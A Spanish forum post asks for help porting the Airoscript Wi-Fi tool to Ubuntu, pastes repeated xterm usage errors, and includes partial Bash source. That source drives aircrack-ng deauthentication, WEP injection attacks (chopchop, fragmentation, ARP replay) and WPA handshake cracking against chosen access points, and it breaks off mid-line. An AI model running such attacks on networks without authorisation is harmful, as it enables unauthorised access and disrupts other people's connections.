Buenas a todos, estos dias he intentado portar el Airoscript nuevo de Wifiway a Ubuntu, y todo funciona bien, se abre, pone la tarjeta en modo monitor, escanear, desautentifica, pero cuando intento realizar un ataque cualquiera, solo me salta la ventana de captura de datos, las otras dos no salen, y me sale esto:
[spoiler=error que se muestra]XTerm(271) usage:
xterm [-options ...] [-e command args]
where options include:
-/+132 turn on/off 80/132 column switching
XTerm(271) usage:
-C intercept console messages
xterm [-options ...] [-e command args]
-Sccn slave mode on "ttycc", file descriptor "n"
where options include:
-T string title name for window
-/+132 turn on/off 80/132 column switching
-/+ah turn on/off always highlight
-C intercept console messages
-/+ai turn off/on active icon
-Sccn slave mode on "ttycc", file descriptor "n"
-/+aw turn on/off auto wraparound
-T string title name for window
-b number internal border in pixels
-/+ah turn on/off always highlight
-/+bc turn on/off text cursor blinking
-/+ai turn off/on active icon
-bcf milliseconds time text cursor is off when blinking
-/+aw turn on/off auto wraparound
-bcn milliseconds time text cursor is on when blinking
-b number internal border in pixels
-bd color border color
-/+bc turn on/off text cursor blinking
-/+bdc turn off/on display of bold as color
-bcf milliseconds time text cursor is off when blinking
-bg color background color
-bcn milliseconds time text cursor is on when blinking
-bw number border width in pixels
-bd color border color
-/+cb turn on/off cut-to-beginning-of-line inhibit
-/+bdc turn off/on display of bold as color
-cc classrange specify additional character classes
-bg color background color
-/+cjk_width turn on/off legacy CJK width convention
-bw number border width in pixels
-class string class string (XTerm)
-/+cb turn on/off cut-to-beginning-of-line inhibit
-cc classrange specify additional character classes
-/+cjk_width turn on/off legacy CJK width convention
-class string class string (XTerm)
-/+cm turn off/on ANSI color mode
-/+cn turn on/off cut newline inhibit
-cr color text cursor color
-/+cu turn on/off curses emulation
-/+dc turn off/on dynamic color selection
-display displayname X server to contact
-e command args ... command to execute
-fa pattern FreeType font-selection pattern
-/+cm turn off/on ANSI color mode
-fb fontname bold text font
-/+cn turn on/off cut newline inhibit
-/+fbb turn on/off normal/bold font comparison inhibit
-cr color text cursor color
-/+fbx turn off/on linedrawing characters
-/+cu turn on/off curses emulation
-fd pattern FreeType Doublesize font-selection pattern
-/+dc turn off/on dynamic color selection
-fg color foreground color
-display displayname X server to contact
-fi fontname icon font for active icon
-e command args ... command to execute
-fn fontname normal text font
-fa pattern FreeType font-selection pattern
-fs size FreeType font-size
-fb fontname bold text font
-/+fullscreen turn on/off fullscreen on startup
-/+fbb turn on/off normal/bold font comparison inhibit
-fw fontname doublewidth text font
-/+fbx turn off/on linedrawing characters
-fwb fontname doublewidth bold text font
-fd pattern FreeType Doublesize font-selection pattern
-fx fontname XIM fontset
-fg color foreground color
%geom Tek window geometry
-fi fontname icon font for active icon
-fn fontname normal text font
-fs size FreeType font-size
-/+fullscreen turn on/off fullscreen on startup
-fw fontname doublewidth text font
-fwb fontname doublewidth bold text font
-fx fontname XIM fontset
%geom Tek window geometry
#geom icon window geometry
-geometry geom size (in characters) and position
-help print out this message
-/+hm turn on/off selection-color override
-/+hold turn on/off logic that retains window after exit
-iconic start iconic
-/+ie turn on/off initialization of 'erase' from pty
-/+im use insert mode for TERMCAP
-into windowId use the window id given to -into as the parent window rather than the default root window
-/+j turn on/off jump scroll
-/+k8 turn on/off C1-printable classification
-kt keyboardtype set keyboard type: tcap sun vt220
-/+l turn on/off logging
-/+lc turn on/off locale mode using luit
-lcc path filename of locale converter (/usr/bin/luit)
-leftbar force scrollbar left
-lf filename logging filename
-/+ls turn on/off login shell
-/+maximized turn on/off maxmize on startup
-/+mb turn on/off margin bell
-mc milliseconds multiclick time in milliseconds
-/+mesg forbid/allow messages
-/+mk_width turn on/off simple width convention
-ms color pointer color
-n string icon name for window
-name string client instance, icon, and title strings
-nb number margin bell in characters from right end
-/+nul turn off/on display of underlining
-/+pc turn on/off PC-style bold colors
-/+pob turn on/off pop on bell
-rightbar force scrollbar right (default left)
-/+rv turn on/off reverse video
-/+rvc turn off/on display of reverse as color
-/+rw turn on/off reverse wraparound
-/+s turn on/off multiscroll
-/+samename turn on/off the no-flicker option for title and icon name
-/+sb turn on/off scrollbar
-selbg color selection background color
-selfg color selection foreground color
-/+sf turn on/off Sun Function Key escape codes
-/+si turn on/off scroll-on-tty-output inhibit
-/+sk turn on/off scroll-on-keypress
-sl number number of scrolled lines to save
-/+sm turn on/off the session-management support
-/+sp turn on/off Sun/PC Function/Keypad mapping
-/+t turn on/off Tek emulation window
-ti termid terminal identifier
-title string title string
-tm string terminal mode keywords and characters
-tn name TERM environment variable name
-/+u8 turn on/off UTF-8 mode (implies wide-characters)
-/+uc turn on/off underline cursor
-/+ulc turn off/on display of underline as color
-/+ulit turn off/on display of underline as italics
-/+ut turn on/off utmp support
-/+vb turn on/off visual bell
-version print the version number
-/+wc turn on/off wide-character mode
-/+wf turn on/off wait for map before command exec
-xrm resourcestring additional resource specifications
-ziconbeep percent beep and flag icon of window having hidden output
Fonts should be fixed width and, if both normal and bold are specified, should
have the same size. If only a normal font is specified, it will be used for
both normal and bold text (by doing overstriking). The -e option, if given,
must appear at the end of the command line, otherwise the user's default shell
will be started. Options that start with a plus sign (+) restore the default.
#geom icon window geometry
-geometry geom size (in characters) and position
-help print out this message
-/+hm turn on/off selection-color override
-/+hold turn on/off logic that retains window after exit
-iconic start iconic
-/+ie turn on/off initialization of 'erase' from pty
-/+im use insert mode for TERMCAP
-into windowId use the window id given to -into as the parent window rather than the default root window
-/+j turn on/off jump scroll
-/+k8 turn on/off C1-printable classification
-kt keyboardtype set keyboard type: tcap sun vt220
-/+l turn on/off logging
-/+lc turn on/off locale mode using luit
-lcc path filename of locale converter (/usr/bin/luit)
-leftbar force scrollbar left
-lf filename logging filename
-/+ls turn on/off login shell
-/+maximized turn on/off maxmize on startup
-/+mb turn on/off margin bell
-mc milliseconds multiclick time in milliseconds
-/+mesg forbid/allow messages
-/+mk_width turn on/off simple width convention
-ms color pointer color
-n string icon name for window
-name string client instance, icon, and title strings
-nb number margin bell in characters from right end
-/+nul turn off/on display of underlining
-/+pc turn on/off PC-style bold colors
-/+pob turn on/off pop on bell
-rightbar force scrollbar right (default left)
-/+rv turn on/off reverse video
-/+rvc turn off/on display of reverse as color
-/+rw turn on/off reverse wraparound
-/+s turn on/off multiscroll
-/+samename turn on/off the no-flicker option for title and icon name
-/+sb turn on/off scrollbar
-selbg color selection background color
-selfg color selection foreground color
-/+sf turn on/off Sun Function Key escape codes
-/+si turn on/off scroll-on-tty-output inhibit
-/+sk turn on/off scroll-on-keypress
-sl number number of scrolled lines to save
-/+sm turn on/off the session-management support
-/+sp turn on/off Sun/PC Function/Keypad mapping
-/+t turn on/off Tek emulation window
-ti termid terminal identifier
-title string title string
-tm string terminal mode keywords and characters
-tn name TERM environment variable name
-/+u8 turn on/off UTF-8 mode (implies wide-characters)
-/+uc turn on/off underline cursor
-/+ulc turn off/on display of underline as color
-/+ulit turn off/on display of underline as italics
-/+ut turn on/off utmp support
-/+vb turn on/off visual bell
-version print the version number
-/+wc turn on/off wide-character mode
-/+wf turn on/off wait for map before command exec
-xrm resourcestring additional resource specifications
-ziconbeep percent beep and flag icon of window having hidden output
Fonts should be fixed width and, if both normal and bold are specified, should
have the same size. If only a normal font is specified, it will be used for
both normal and bold text (by doing overstriking). The -e option, if given,
must appear at the end of the command line, otherwise the user's default shell
will be started. Options that start with a plus sign (+) restore the default.[/spoiler]
Por si acaso, os dejo el codigo fuente del airoscript que tengo (las rutas establecidas las tengo bien y tengo la suite aircrack-ng mdk3 konsole kommander xterm macchanger wireless-tools...)
[spoiler=Codigo fuente Airoscript]#! /bin/bash
# Program: Airoscript
# Version: sw2.2 beta 7
# Authors: Base Code by Daouid
# Mods & Tweaks by CurioCT and others
# Traducción y mejoras añadidas realizadas Por Chinitiw, elmanuvolador, alist3r y USUARIONUEVO para Seguridad Wireless
# Credits: Hirte, Befa, Stouf, Mister_X, ASPj , Andrea, Pilotsnipes, darkAudax, Atheros support thx to green-freq
#
# Version of aircrack-ng required: AIRCRACK-NG 1.1
# Dependencies: aircrack-ng, xterm, grep, awk, macchanger, drivers capable of injection, mdk3 (optional)
clear
## GLOBAL VARS
#Allows all xterm window to stay on screen after the operation they contain is finished
DEBUG="0"
## PATHS TO BINARIES
#CardCtl executable (on 2.4 kernels, it is cardctl)
CARDCTL="pccardctl"
#Your dhcp client utility
DHCPSOFT="dhcpcd"
## PATH TO FILES AND FOLDERS
#cracked keys will be stored here
KEYS="/home/vk496/swireless/airoscript/keys"
#The path where the captured data is stored (FOLDER MUST EXIST !)
DUMP_PATH="/home/vk496/swireless/airoscript/capturas"
# Path where ARP-forged packets are stored
ARP_PATH="/home/vk496/swireless/airoscript/capturas"
# Path to the temporary wordlist file (for WPA and WEP dictionnary attack)
WORDLIST_FOLDER="/home/vk496/swireless/airoscript/wordlist"
WORDLIST_PATH="$WORDLIST_FOLDER"/wordlist
## AIRCRACK FINE-TUNING
#This is the rate per second at wich packets will be injected
INJECTRATE="350"
#How many times the deauth attack is run
DEAUTHTIME="5"
#Time between re-association with target AP
AUTHDELAY="200"
KEEPALIVE="120"
#Fudge factor setting
FUDGEFACTOR="2"
# IP of the AP and clients to be used for CHOPCHOP and Fragmentation attack
# Host_IP and Client_IP used for arp generation from xor file (frag and chopchop)
Host_IP="192.168.1.1"
Client_IP="192.168.1.33"
# Fragmentation IP
FRAG_HOST_IP="192.168.1.1"
FRAG_CLIENT_IP="192.168.1.37"
## ---8<---8<--- DONT EDIT ANYTHING PAST THIS LINE
function menu {
target
echo "MENU PRINCIPAL"
echo " "
echo " 1) Escanear -Buscar Objetivos "
echo " 2) Seleccionar -Seleccionar Objetivo "
echo " 3) Ataques -Atacar Objetivo "
echo " 4) Auditar -Menu Auditar "
echo " 5) Auto -Buscar Key Automaticamente "
echo " 6) Autenticar -Cliente Falso en Objetivo "
echo " 7) Desautenticar -Desautenticar del Objetivo "
echo " 8) Inyección -Menu de Inyección "
echo " 9) Opciones Avanzadas -Utilidades Varias "
echo " 10) Salir -Cerrar Airoscript "
echo
}
function setresolution {
echo -n Autodetectando Resolución...
detectedresolution=$(xdpyinfo | grep -A 3 "screen #0" | grep dimensions | tr -s " " | cut -d" " -f 3)
echo $detectedresolution
## A) 1024x600
## B) 1024x768
## C) 1280x768
## D) 1280x1024
## E) 1600x1200
case $detectedresolution in
"1024x600" ) resA ;;
"1024x768" ) resB ;;
"1280x768" ) resC ;;
"1366x768" ) resC ;;
"1280x1024" ) resD ;;
"1600x1200" ) resE ;;
* ) resA ;; ## fallback a una opción segura
esac
}
function resA {
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 90x13+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 83x26-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 90x24+0-0"
# Bottom right window -0-0
BOTTOMRIGHT="-geometry 75x12-0-0"
TOPLEFTBIG="-geometry 91x42+0+0"
TOPRIGHTBIG="-geometry 83x26-0+0"
}
function resB {
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 92x14+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 68x25-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 92x36+0-0"
# Bottom right window -0-0
BOTTOMRIGHT="-geometry 74x20-0-0"
TOPLEFTBIG="-geometry 100x52+0+0"
TOPRIGHTBIG="-geometry 74x30-0+0"
}
function resC {
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 100x20+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 109x20-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 100x30+0-0"
# Bottom right window -0-0
BOTTOMRIGHT="-geometry 109x20-0-0"
TOPLEFTBIG="-geometry 100x52+0+0"
TOPRIGHTBIG="-geometry 109x30-0+0"
}
function resD {
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 110x35+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 99x40-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 110x35+0-0"
# Bottom right window -0-0
BOTTOMRIGHT="-geometry 99x30-0-0"
TOPLEFTBIG="-geometry 110x72+0+0"
TOPRIGHTBIG="-geometry 99x40-0+0"
}
function resE {
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 130x43+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 68x25-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 130x40+0-0"
BOTTOMRIGHT="-geometry 132x35-0-0"
TOPLEFTBIG="-geometry 130x85+0+0"
TOPRIGHTBIG="-geometry 132x48-0+0"
}
function airmoncheck {
xterm -e airmon-ng check $WIFI
echo ""
optionmenu
}
function monitor_interface2 {
iwconfig $WIFI channel $Host_CHAN
}
function setinterface {
INTERFACES=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'} |grep -v lo`
if [ "$WIFI2" = "" ]
then
echo "Selecciona una interface: "
echo ""
select WIFI2 in $INTERFACES; do
break;
done
sleep 1
WIFI2MODE=$(iwconfig $WIFI2 | grep Mode | awk '{print $1,$4,$3}' | awk 'BEGIN { FS = ":" } ; { print $2}' | awk '{print $1}')
mode$WIFI2MODE
>&1 > /dev/null
detectarmac
info
else
foo=foo
fi
clear
menu
}
function mode {
echo "Interface no válida, elige de nuevo"
sleep 2
setinterface
}
function modeManaged {
while true; do
clear
echo "AVISO"
echo
echo " Interface en modo managed "
echo " Desea activar modo monitor? "
echo " "
echo " 1) Si (compat wireless) "
echo " 2) Si (Atheros madwifi) "
echo " 3) Si (otros drivers) "
echo " 4) No "
echo " "
echo -n " #> "
read yn
clear
case $yn in
1 ) drivers-compat ; break ;;
2 ) drivers-madwifi ; break ;;
3 ) drivers-otros ; break ;;
4 ) modeMonitor ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
}
function modeMonitor {
TYPE=`airmon-ng | grep $WIFI2 | awk '{print $2}'| cut -d "-" -f1`
DRIVER=`airmon-ng | grep $WIFI2| awk '{print $3,$5}'| cut -d "[" -f1`
WIFI=$WIFI2
}
function drivers-compat {
AIROUTPUT=$(airmon-ng start $WIFI2|grep -v "running"|grep -A1 $WIFI2);
## echo $AIROUTPUT > airoutputdebug.txt
TYPE=`airmon-ng | grep $WIFI2 | awk '{print $2}'| cut -d "-" -f1`
DRIVER=`airmon-ng | grep $WIFI2| awk '{print $3,$5}'| cut -d "[" -f1`
tmpwifi=`echo \"$AIROUTPUT\" | awk {'print $NF'} | cut -d ")" -f1`
WIFI=$tmpwifi
echo Buscando y matando procesos conflictivos que controlen $WIFI2...
/etc/rc.d/rc.wicd stop > /dev/null
## gracias a pepe10000 por el aviso de que WICD se regeneraba; al ser un daemon es mas inteligente detenerlo que matarlo.
for proceso in $(airmon-ng check $WIFI2 | grep running | cut -d " " -f 4); do kill -9 $proceso; done
}
function drivers-otros {
AIROUTPUT=$(airmon-ng start $WIFI2|grep -v "running"|grep -A1 $WIFI2);
TYPE=`echo \"$AIROUTPUT\" | grep monitor | awk '{print $2}'`
DRIVER=`echo \"$AIROUTPUT\" | grep monitor| awk '{print $3}'`
WIFI=$WIFI2
echo Buscando y matando procesos conflictivos que controlen $WIFI2"..."
for proceso in $(airmon-ng check $WIFI2 | grep running | cut -d " " -f 4); do kill -9 $proceso; echo $proceso;done
}
function drivers-madwifi {
wlanconfig $WIFI2 destroy
modprobe -r ath_pci
modprobe ath_pci autocreate=monitor
WIFI=`airmon-ng | grep parent | awk '{print $1}'`
TYPE=`airmon-ng | grep $WIFI2 | awk '{print $2}'`
DRIVER=`airmon-ng | grep $WIFI2| awk '{print $3}'`
echo Buscando y matando procesos conflictivos que controlen $WIFI2"..."
for proceso in $(airmon-ng check $WIFI2 | grep running | cut -d " " -f 4); do kill -9 $proceso; echo $proceso;done
}
function detectarmac {
realmac=$(macchanger -s $WIFI | grep "Current" | awk '{ print $3 }')
FAKE_MAC=$realmac
}
function info {
#Modo de la interface managed/monitor
WIFIMODE=$(iwconfig $WIFI | grep Mode | awk '{print $1,$4,$3}' | awk 'BEGIN { FS = ":" } ; { print $2}' | awk '{print $1}')
WIFI2MODE=$(iwconfig $WIFI2 | grep Mode | awk '{print $1,$4,$3}' | awk 'BEGIN { FS = ":" } ; { print $2}' | awk '{print $1}')
# Modelo ap
Host_MAC_info1=`echo $Host_MAC | awk 'BEGIN { FS = ":" } ; { print $1":"$2":"$3}'`
Host_MAC_MODEL=`macchanger -l | grep $Host_MAC_info1 | awk '{ print "("$5,$6,$7")" }'`
echo "INFO INTERFAZ"
echo
echo " Interfaz = $WIFI / modo $WIFIMODE"
echo " Chipset/Driver = $TYPE $DRIVER"
echo " Tu MAC = $FAKE_MAC"
echo
}
# This is another great contribution from CurioCT that allows you to manually enter SSID if none is set
function blankssid {
while true; do
clear
echo "SSID INCORRECTO DETECTADO"
echo
echo " Desea introducir uno nuevo "
echo " 1) Si "
echo " 2) No "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) Host_ssidinput ; break ;;
2 ) Host_SSID="" ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
# This is the input part of previous function
function Host_ssidinput {
echo " "
echo -n " Introduce el SSID >"
read Host_SSID
set -- ${Host_SSID}
clear
}
# This is the function to select Target from a list
## MAJOR CREDITS TO: Befa , MY MASTER, I have an ALTAR dedicated to him in my living room
## And HIRTE for making all those great patch and fixing the SSID issue
function Parseforap {
clear
case $AdvancedESSIDFilter in
"" ) ;;
* ) echo -e "AVISO: Filtro de pantalla por ESSID activado. Patrón filtrado:" $AdvancedESSIDFilter;
echo -e "Puedes desactivar el filtro en Opciones Avanzadas";;
esac
ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`
# averigua, dentro del CSV, a partir de que linea se acaba la lista de AP y empieza la lista de clientes conectados
head -n $ap_array $DUMP_PATH/dump-01.csv | grep -a $AdvancedESSIDFilter - &> $DUMP_PATH/dump-02.csv
# pasa a un array solo la lista de APs, desechando la de clientes
tabs -n 6
echo " Listado de APs Objetivo"
echo ""
echo -e " #\tMAC CN\t SEG\t\t PWR\t #PAQ\t SSID"
echo ""
i=0
while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do
longueur=${#MAC}
if [ $longueur -ge 17 ]; then
i=$(($i+1))
echo -e " "$i")\t"$MAC" "$CHANNEL"\t"$PRIVACY" \t"$POWER"\t"$IDLENGTH"\t"$ESSID
aidlenght=$IDLENGTH
assid[$i]="$ESSID" # estas comillas son parte de la solución al problema de los SSID con espacios.
achannel[$i]=$CHANNEL
amac[$i]=$MAC
aprivacy[$i]=$PRIVACY
aspeed[$i]=$SPEED
fi
done < $DUMP_PATH/dump-02.csv
echo ""
echo -n " Selecciona Objetivo> "
read choice
idlenght=${aidlenght[$choice]}
ssid=${assid[$choice]}
channel=${achannel[$choice]}
mac=${amac[$choice]}
privacy=${aprivacy[$choice]}
speed=${aspeed[$choice]}
Host_IDL=$idlength
Host_SPEED=$speed
Host_ENC=$privacy
Host_MAC=$mac
Host_CHAN=$channel
acouper=${#ssid}
fin=$(($acouper-idlength))
Host_SSID=${ssid:1:fin}
}
function choosetype {
while true; do
clear
echo "SELECCIONA MODO DE BÚSQUEDA"
echo " "
echo " 1) Sin filtros "
echo " 2) OPN "
echo " 3) WEP "
echo " 4) WPA "
echo " 5) WPA2 "
echo " 6) WPA y WPA2 "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) ENCRYPT="" ; break ;;
2 ) ENCRYPT="OPN" ; break ;;
3 ) ENCRYPT="WEP" ; break ;;
4 ) ENCRYPT="WPA1" ; break ;;
5 ) ENCRYPT="WPA2" ; break ;;
6 ) ENCRYPT="WPA" ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function SetAdvancedESSIDFilter {
clear
echo "INTRODUCE FILTRO DE DISPLAY"
echo
echo " Introduce patrón para filtrar "
echo " las redes por SSID. Ejemplos: "
echo " "
echo " * WLAN_ "
echo " * Vodafone "
echo " * ONO "
echo " * Tele2 "
echo " "
echo " (En blanco para desactivar) "
echo " "
echo " NOTA: El filtrado se aplica solo"
echo " en la pantalla de selección de "
echo " objetivo, no durante la captura "
echo " "
echo -n " Patrón >"
read AdvancedESSIDFilter
set -- ${AdvancedESSIDFilter}
clear
}
function choosefake {
while true; do
clear
echo "MÉTODO DE AUTENTICACIÓN"
echo " "
echo " 1) Estándar "
echo " 2) Conservador "
echo " 3) Progresivo "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) fakeauth2 ; break ;;
2 ) fakeauth1 ; break ;;
3 ) fakeauth3 ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function choosescan {
while true; do
clear
echo "SELECCIONA CANAL"
echo " "
echo " 1) Todos los canales "
echo " 2) Canal(es) específico(s) "
echo " "
echo -n " #> "
read yn
echo ""
case $yn in
1 ) Scan ; break ;;
2 ) Scanchan ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function choosetarget {
while true; do
clear
echo "¿SELECCIONAR UN CLIENTE?"
echo " "
echo " 1) Si "
echo " 2) No "
echo " 3) Corregir el SSID Primero "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) askclientsel ; break ;;
2 ) break ;;
3 ) Host_ssidinput && choosetarget ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function choosedeauth {
while true; do
clear
echo "¿A QUIÉN DESAUTENTICAR?"
echo " "
echo " 1) A todos "
echo " 2) A mí mismo "
echo " 3) Al cliente seleccionado "
echo " 4) A otra dirección MAC "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) deauthall ; break ;;
2 ) deauthfake ; break ;;
3 ) deauthclient ; break ;;
4 ) inputmactodeauth ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function inputmactodeauth {
echo -n "Teclea la MAC a desautenticar del AP >"
read MANUAL_MAC2
xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" -title "Desautenticando a $MANUAL_MAC2 de $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC -c $MANUAL_MAC2 $WIFI &
}
function attackwep {
while true; do
clear
echo "ATAQUES SIN CLIENTES"
echo " "
echo " 1) Falsa auth => Automatica "
echo " 2) Falsa auth => Interactiva "
echo " 3) Fragmentation "
echo " 4) Chopchop "
echo " 5) Cafe Latte "
echo " 6) Hirte "
echo " "
echo "ATAQUES USANDO UN CLIENTE"
echo " "
echo " 7) ARP replay => Automatico "
echo " 8) ARP replay => Interactivo "
echo " 9) Fragmentation "
echo " 10) Frag. attack con cliente "
echo " 11) Chopchop "
echo " "
echo "INYECCIÓN SI SE GENERA EL XOR"
echo " "
echo " 12) ARP inject desde xor (PSK) "
echo " 13) Volver al menu Principal "
echo " "
echo -n " #> "
read yn
echo ""
case $yn in
1 ) attack ; break ;;
2 ) fakeinteractiveattack ; break ;;
3 ) fragnoclient ; break ;;
4 ) chopchopattack ; break ;;
5 ) cafelatteattack ; break ;;
6 ) hirteattack ; break ;;
7 ) attackclient ; break ;;
8 ) interactiveattack ; break ;;
9 ) fragmentationattack ; break ;;
10 ) fragmentationattackclient ; break ;;
11 ) chopchopattackclient ; break ;;
12 ) pskarp ; break ;;
13 ) break ;;
* ) echo "Opción desconocida. Elije de nuevo" ;;
esac
done
clear
}
function attackopn {
clear
echo " "
echo " La red seleccionada es abierta "
echo
sleep 3
clear
}
function attackunknown {
clear
echo " "
echo " La red seleccionada posee una "
echo " seguridad no implementada: $Host_ENC "
sleep 3
clear
}
function askclientsel {
while true; do
clear
echo "SELECCIONA EL CLIENTE"
echo " "
echo " 1) Clientes detectados del AP objetivo"
echo " 2) Clientes detectados de todos los APs"
echo " 3) Realizar desaut. masiva al AP objetivo + redetectar sus clientes"
echo " 4) Introducir manualmente MAC de un cliente"
echo " "
echo -n " #> "
read yn
echo ""
case $yn in
1 ) listclients fromtarjetap; break ;;
2 ) listclients fromallaps; break ;;
3 ) clientdetectandchoose ; break ;;
4 ) clientinput ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function clientinput {
clear
echo " "
echo -n " Teclea la mac del cliente >"
read Client_MAC
set -- ${Client_MAC}
}
function listclients {
case $1 in
fromtarjetap )
echo "Listando clientes del AP objetivo..."
HOST=`cat $DUMP_PATH/dump-01.csv | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -v $Host_MAC`;;
fromallaps )
echo "Listando clientes de todos los APs detectads..."
HOST=`cat $DUMP_PATH/dump-01.csv | grep -a "0.:..:..:..:.." | awk '{ print $1 }'| grep -a -v 00:00:00:00`;;
fromclientdetection )
echo "Listando clientes del AP objetivo despues de una desautenticación masiva..."
HOST=`cat $DUMP_PATH/$Host_MAC-01.csv | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -a -v $Host_MAC`;;
esac
clear
echo "SELECCIONA CLIENTE"
echo ""
select CLIENT in $HOST;
do
export Client_MAC=` echo $CLIENT | awk '{
split($1, info, "," )
print info[1] }' `
break;
done
clear
}
function cleanup {
killall -9 aireplay-ng airodump-ng > /dev/null &
ifconfig $WIFI down
airmon-ng stop $WIFI
clear
sleep 2
$CARDCTL eject
sleep 2
$CARDCTL insert
airmon-ng start $WIFI2
ifconfig $WIFI up
iwconfig $WIFI
optionmenu
}
function target {
clear
info
if [[ -z "$Host_MAC" ]]; then return; fi
Host_CHAN=$(echo $Host_CHAN | tr -d " ")
Host_SPEED=$(echo $Host_SPEED | tr -d " ")
echo "INFO AP OBJETIVO"
echo
echo " SSID = $Host_SSID /$Host_ENC"
echo " Canal = $Host_CHAN"
echo " Velocidad = $Host_SPEED Mbps"
echo " MAC del AP = $Host_MAC $Host_MAC_MODEL"
echo " MAC de cliente = $Client_MAC"
echo
}
function configure {
aircrack-ng -a 1 -b $Host_MAC -s -0 -z $DUMP_PATH/$Host_MAC-01.cap &> $DUMP_PATH/$Host_MAC.key
KEY=`cat $DUMP_PATH/$Host_MAC.key | grep KEY | awk '{ print $4 }'`
}
function wpaconfigure {
aircrack-ng -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $WORDLIST &> $DUMP_PATH/$Host_MAC.key
KEY=`cat $DUMP_PATH/$Host_MAC.key | grep KEY | awk '{ print $4 }'`
}
function witchcrack {
if [ $Host_ENC = "WEP" ]
then
crack
else
wpacrack
fi
}
function witchattack {
if [ $Host_ENC = "WEP" ]
then
monitor_interface2
attackwep
elif [ $Host_ENC = "WPA2" ]
then
monitor_interface2
wpahandshake
elif [ $Host_ENC = "WPA&q